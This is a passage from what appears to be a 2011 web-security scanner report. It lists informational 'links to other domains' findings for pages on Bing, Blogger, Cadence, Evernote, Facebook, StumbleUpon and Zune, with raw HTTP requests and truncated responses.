<li><a href="http://en.wikipedia.org/wiki/ActiveX_control#History" onmousedown="return si_T('&amp;ID=SERP,5080.1')">History</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/ActiveX_control#ActiveX_in_non-IE_applications" onmousedown="return si_T('&amp;ID=SERP,5081.1')">ActiveX in non-IE ...</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/ActiveX_control#Other_ActiveX_technologies" onmousedown="return si_T('&amp;ID=SERP,5082.1')">Other ActiveX ...</a>
...[SNIP]...
<h3><a href="http://www.obout.com/" onmousedown="return si_T('&amp;ID=SERP,5147.1')">obout - Home</a>
...[SNIP]...
<h3><a href="http://www.duluthnewstribune.com/event/article/id/201169/" onmousedown="return si_T('&amp;ID=SERP,5165.1')">Duluth News Tribune | Duluth, Minnesota</a>
...[SNIP]...
<h3><a href="http://www.duluthnewstribune.com/event/article/id/168474/" onmousedown="return si_T('&amp;ID=SERP,5183.1')">Duluth News Tribune | Duluth, Minnesota</a>
...[SNIP]...
<h3><a href="http://www.inforum.com/event/article/id/307004/" onmousedown="return si_T('&amp;ID=SERP,5201.1')">INFORUM | Fargo, ND</a>
...[SNIP]...
<h3><a href="http://www.inforum.com/event/article/id/306876/" onmousedown="return si_T('&amp;ID=SERP,5219.1')">INFORUM | Fargo, ND</a>
...[SNIP]...
<h3><a href="http://onlinecredentials.com/PressPass.htm" onmousedown="return si_T('&amp;ID=SERP,5235.1')">OnlineCredentials.com\<strong>
...[SNIP]...
<h3><a href="http://www.dglobe.com/event/article/id/49101/" onmousedown="return si_T('&amp;ID=SERP,5253.1')">Worthington Daily Globe | Worthington, Minnesota</a>
...[SNIP]...
</span><a href="http://go.microsoft.com/?linkid=9771044" class="sn_link" tabindex="0" onmousedown="return si_T('&amp;ID=SERP,5311.1')"><span>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,72.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,74.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,76.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,78.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,80.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsatweb&amp;P2=presspass+controls&amp;P3=0&amp;P4=BMME&amp;P5=E66C4FBB1F654227B7791E57B71ACE3C&amp;P6=Washington, District Of Columbia&amp;P9=38.906898498%2f-77.028396606&amp;P10=0&amp;P11=&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3dpresspass+controls%26qsc0%3d0%26FORM%3dFEEDTU" id="sb_feedback" onclick="si_fb.openCard(this);return false" onfocus="si_fb.loadCard()" onmousedown="return si_T('&amp;ID=FD,82.1')">Tell us what you think</a>
...[SNIP]...
13.6. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=presspass%20controls&FORM=MSSBMN HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:19:45 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-UA-Compatible: IE=7
Date: Wed, 06 Jul 2011 11:20:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=E9BAB4C7FF984C72A2A7D8BEAEA22874; domain=.bing.com; path=/
Set-Cookie: MUID=067CC8A94F2C44DCA6EE1FBCBC8D44CF; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=067CC8A94F2C44DCA6EE1FBCBC8D44CF%2c10716aee572d4952b36b2971f6480e26; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1846760&MS=1846760&AF=MSSBMN; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=18047B6C75F646499C286F39250DB552; expires=Fri, 05-Jul-2013 11:20:45 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110706; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Content-Length: 35959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<h3><a href="http://www.microsoft.com/presspass/press/1996/aug96/cntrlpdpr.mspx" onmousedown="return si_T('&amp;ID=SERP,5046.1')">Microsoft Announces Immediate Availability of ActiveX <strong>
...[SNIP]...
<h3><a href="http://www.microsoft.com/presspass/features/2003/dec03/12-17SoxComplianceQA.mspx" onmousedown="return si_T('&amp;ID=SERP,5063.1')">New Microsoft Offering to Help Address Sarbanes-Oxley Compliance ...</a>
...[SNIP]...
<h3><a href="http://en.wikipedia.org/wiki/ActiveX_control" onmousedown="return si_T('&amp;ID=SERP,5098.1')">ActiveX - Wikipedia, the free encyclopedia</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/ActiveX_control#ActiveX_controls" onmousedown="return si_T('&amp;ID=SERP,5079.1')">ActiveX <strong>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/ActiveX_control#History" onmousedown="return si_T('&amp;ID=SERP,5080.1')">History</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/ActiveX_control#ActiveX_in_non-IE_applications" onmousedown="return si_T('&amp;ID=SERP,5081.1')">ActiveX in non-IE ...</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/ActiveX_control#Other_ActiveX_technologies" onmousedown="return si_T('&amp;ID=SERP,5082.1')">Other ActiveX ...</a>
...[SNIP]...
<h3><a href="http://www.obout.com/" onmousedown="return si_T('&amp;ID=SERP,5147.1')">obout - Home</a>
...[SNIP]...
<h3><a href="http://www.duluthnewstribune.com/event/article/id/201169/" onmousedown="return si_T('&amp;ID=SERP,5165.1')">Duluth News Tribune | Duluth, Minnesota</a>
...[SNIP]...
<h3><a href="http://www.duluthnewstribune.com/event/article/id/168474/" onmousedown="return si_T('&amp;ID=SERP,5183.1')">Duluth News Tribune | Duluth, Minnesota</a>
...[SNIP]...
<h3><a href="http://www.inforum.com/event/article/id/307004/" onmousedown="return si_T('&amp;ID=SERP,5201.1')">INFORUM | Fargo, ND</a>
...[SNIP]...
<h3><a href="http://www.inforum.com/event/article/id/306876/" onmousedown="return si_T('&amp;ID=SERP,5219.1')">INFORUM | Fargo, ND</a>
...[SNIP]...
<h3><a href="http://onlinecredentials.com/PressPass.htm" onmousedown="return si_T('&amp;ID=SERP,5235.1')">OnlineCredentials.com\<strong>
...[SNIP]...
<h3><a href="http://www.dglobe.com/event/article/id/49101/" onmousedown="return si_T('&amp;ID=SERP,5253.1')">Worthington Daily Globe | Worthington, Minnesota</a>
...[SNIP]...
</span><a href="http://go.microsoft.com/?linkid=9771044" class="sn_link" tabindex="0" onmousedown="return si_T('&amp;ID=SERP,5311.1')"><span>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,72.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,74.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,76.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,78.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,80.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsatweb&amp;P2=presspass+controls&amp;P3=0&amp;P4=MSSBMN&amp;P5=067CC8A94F2C44DCA6EE1FBCBC8D44CF&amp;P6=Washington, District Of Columbia&amp;P9=38.906898498%2f-77.028396606&amp;P10=0&amp;P11=&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3dpresspass+controls%26FORM%3dFEEDTU" id="sb_feedback" onclick="si_fb.openCard(this);return false" onfocus="si_fb.loadCard()" onmousedown="return si_T('&amp;ID=FD,82.1')">Tell us what you think</a>
...[SNIP]...
13.7. http://www.blogger.com/blog_this.pyra  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogger.com
Path:   /blog_this.pyra

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /blog_this.pyra?t=&u=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&n=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US HTTP/1.1
Host: www.blogger.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: blogger_TID=1ff906bea4e99427; HttpOnly
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Wed, 06 Jul 2011 11:40:29 GMT
Location: https://www.google.com/accounts/ServiceLogin?service=blogger&hl=en&ltmpl=popup&continue=http://www.blogger.com/start?successUrl%3D/blog-this.g?t%2526u%253Dhttp://search.microsoft.com/results.aspx?q%25253Dpresspass%252Bcontrols%252526FORM%25253DMSERRO%252526mkt%25253Den-US%2526n%253Dhttp://search.microsoft.com/results.aspx?q%25253Dpresspass%252Bcontrols%252526FORM%25253DMSERRO%252526mkt%25253Den-US&passive=86400
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?service=blogger&amp;hl=en&amp;ltmpl=popup&amp;continue=http://www.blogger.com/start?successUrl%3D/blog-this.g?t%2526u%253Dhttp://search.microsoft.com/results.aspx?q%25253Dpresspass%252Bcontrols%252526FORM%25253DMSERRO%252526mkt%25253Den-US%2526n%253Dhttp://search.microsoft.com/results.aspx?q%25253Dpresspass%252Bcontrols%252526FORM%25253DMSERRO%252526mkt%25253Den-US&amp;passive=86400">here</A>
...[SNIP]...
13.8. http://www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cadence.com
Path:   /Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx?CMP=home HTTP/1.1
Host: www.cadence.com
Proxy-Connection: keep-alive
Referer: http://www.cadence.com/us/pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=cadencemossprod%3D%2526pid%253Dus%25253Apages%25253Adefault.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-worl%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 140289
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.20917.1142
X-Pingback: http://www.cadence.com/Community/blogs/fv/pingback.aspx
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Wed, 06 Jul 2011 17:00:57 GMT; expires=Fri, 06-Jul-2012 00:00:57 GMT; path=/
Set-Cookie: CSAnonymous=0cf4fa54-a507-48c0-b09a-3c779c8443a8; expires=Thu, 07-Jul-2011 01:00:57 GMT; path=/
Date: Thu, 07 Jul 2011 00:00:57 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
</a>
           <a href="http://www.chipestimate.com/cadence" target="_blank">IP Catalog</a>
...[SNIP]...
</a>
           <a href="http://www.chipestimate.com/" target="_blank">ChipEstimate.com - Chip Planning Portal</a>
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/ii" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/lp" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/ms" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/sd" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/ip" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/fv" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a> <a href="http://feeds2.feedburner.com/cadence/community/blogs/ld" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/di" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/cic" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/rf" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/pcb" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/pkg" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/mfg" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/newsroom/press_releases">
Cadence Press Releases
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/blogs/sd">
System Design and Verification Blog
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/blogs/fv">
Functional Verification Blog
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/blogs/di">
Digital Implementation Blog
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/blogs/cic">
Custom IC Design Blog
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/blogs/rf">
RF Design Blog
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/blogs/pcb">
PCB Design Blog
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/blogs/pkg">
IC Packaging and SiP Design Blog
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/blogs/mfg">
Manufacturability Signoff Blog
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/blogs">
All Blogs
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/forums/22">
System Design and Verification Forum
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/forums/30">
Functional Verification Forum
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/forums/29">
Digital Implementation Forum
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/forums/38">
Custom IC Design Forum
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/forums/48">
Custom IC SKILL Forum
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/forums/31">
Logic Design Forum
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/forums/33">
RF Design Forum
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/forums/27">
PCB Design Forum
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/forums/28">
PCB SKILL Forum
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/forums/32">
IC Packaging and SiP Design Forum
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/forums/34">
Manufacturability Signoff Forum
</a>
...[SNIP]...
</a> last week announcing that we have donated the UVM World Web site (<a href="http://www.uvmworld.org/">www.uvmworld.org</a>
...[SNIP]...
<p>The third reason that the donation to Accellera is important is that it validates the entire concept of a true EDA community site. The <a href="http://www.uvmworld.org/forums/">forum</a> and <a href="http://www.uvmworld.org/contributions.php">contributions</a>
...[SNIP]...
13.9. http://www.evernote.com/clip.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.evernote.com
Path:   /clip.action

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /clip.action?url=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&title=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US HTTP/1.1
Host: www.evernote.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-UA-Compatible: IE=EmulateIE7
Set-Cookie: shard=deleteme; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cookieTestValue=1309951281866; Version=1; Max-Age=378432000; Expires=Mon, 03-Jul-2023 11:21:21 GMT; Path=/
Set-Cookie: JSESSIONID=533B63D3D80594249497C75E3B0979D4; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Wed, 06 Jul 2011 11:21:21 GMT
Connection: close
Server: Evernote/1.0
Content-Length: 8523


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!
...[SNIP]...
<br />
<a class="icon download" href="http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewSoftware?id=281796108&mt=8">iPhone/iPad/iPod Touch</a><br />
<a class="icon download" href="http://market.android.com/details?id=com.evernote">Android</a><br />
<a class="icon download" href="http://appworld.blackberry.com/webstore/content/1700">BlackBerry</a>
...[SNIP]...
13.10. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ca49352c%26origin%3Dhttp%253A%252F%252Fsocial.zune.net%252Ff23b1025f4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fsocial.zune.net%2FMOVIES%2F0%2F34FA18EC-ECDA-4609-BE85-CE80D58C3842%3Ftarget%3Dweb%26culture%3Den-US&layout=button_count&locale=en_US&node_type=link&ref=movie&sdk=joey&show_faces=false&width=100 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=83J6J

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.246.30
X-Cnection: close
Date: Wed, 06 Jul 2011 11:20:28 GMT
Content-Length: 5867

<!doctype html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8"><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/DhINBSBsTFQ.css" />
<script>
...[SNIP]...
13.11. http://www.propeller.com/submit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.propeller.com
Path:   /submit/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /submit/?U=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&T=presspass controls - Microsoft Search HTTP/1.1
Host: www.propeller.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 06 Jul 2011 11:37:04 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Wed, 06 Jul 2011 12:07:04 GMT
Content-length: 116
Content-type: text/html
Location: http://www.aolnews.com/category/goodbye-propeller/
Connection: close

<html>
<body>
Page relocated <a href="http://www.aolnews.com/category/goodbye-propeller/">here.</a>
</body>
</html>
13.12. http://www.stumbleupon.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /submit?url=https%3a%2f%2fwww.microsoft.com%2fpresspass%2fpresskits%2fDCU%2fdefault.aspx HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: su_c=0d1e2bedc0e1135deadbc657c2aa8530%7C%7C10%7C%7C1307312440%7Cb38de0b02793b0d025f256428b4dc8bd; __utmz=189632489.1307312449.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=189632489.866859479.1307275364.1307275364.1307312449.2; __utmv=189632489.|1=user_class=v=1,; su_conf=cfcd208495d565ef66e7dff9f98764da

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 48987
Date: Wed, 06 Jul 2011 11:15:24 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<meta name="description" content="Submit a site to StumbleUpon" />
   
   <link rel="stylesheet" href="http://cdn.stumble-upon.com/css/global_su.css?v=20110701-00" type="text/css" media="screen, projection" />
   <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->
       
       
           <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://cdn.stumble-upon.com/js/plugins_su.js?v=20110701-00"></script>

   <link rel="shortcut icon" href="http://cdn.stumble-upon.com/favicon.ico" />

       
           <title>
...[SNIP]...
<noscript>
                   <img src="http://b.scorecardresearch.com/p?c1=2&c2=7677660&cv=2.0&cj=1" />
               </noscript>
...[SNIP]...
<div id="ff-install-helper" style="display: none;">
               <img id="close-button" src="http://cdn.stumble-upon.com/images/close-button.png" alt="x" />
               <h2>Installing is Easy!<img src="http://cdn.stumble-upon.com/images/s.gif" class="iconArrow24" /></h2>
...[SNIP]...
<div style="padding: 35px 0 200px 320px;" class="clearfix">
                   <img src="http://cdn.stumble-upon.com/i/assets/homePromo1.jpg" height="140" width="278" alt="Discover the best videos from YouTube" class="left" style="margin-left: -300px;"/>
                   <h2 style="padding-top: 15px; margin-bottom: 25px; font-size: 20px;">
...[SNIP]...
<!-- end wrapper -->

   <script type="text/javascript" charset="utf-8" src="http://cdn.stumble-upon.com/js/attach_su.js?v=20110701-00"></script>
...[SNIP]...
13.13. http://zune.net/xweb/lx/js/lxUtil.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://zune.net
Path:   /xweb/lx/js/lxUtil.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /xweb/lx/js/lxUtil.js?ver=11032080 HTTP/1.1
Host: zune.net
Proxy-Connection: keep-alive
Referer: http://zune.net/en-US/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXPUID=dcc9a7e6-6804-4906-b5d8-7b37c2f999d3; defCulture=en-US; lastCulture=en-US

Response

HTTP/1.1 200 OK
Cache-Control: max-age=7200
Content-Length: 203691
Content-Type: application/x-javascript
Last-Modified: Thu, 16 Jun 2011 11:06:54 GMT
Accept-Ranges: bytes
ETag: "01bfb7f152ccc1:3240"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 11:19:04 GMT

(function(s){var m={"\b":"\\b","\t":"\\t","\n":"\\n","\f":"\\f","\r":"\\r",'"':'\\"',"\\":"\\\\"};s.parseJSON=function(filter){var j;function walk(k,v){var i;if(v&&typeof v==="object"){for(i in v){if(
...[SNIP]...
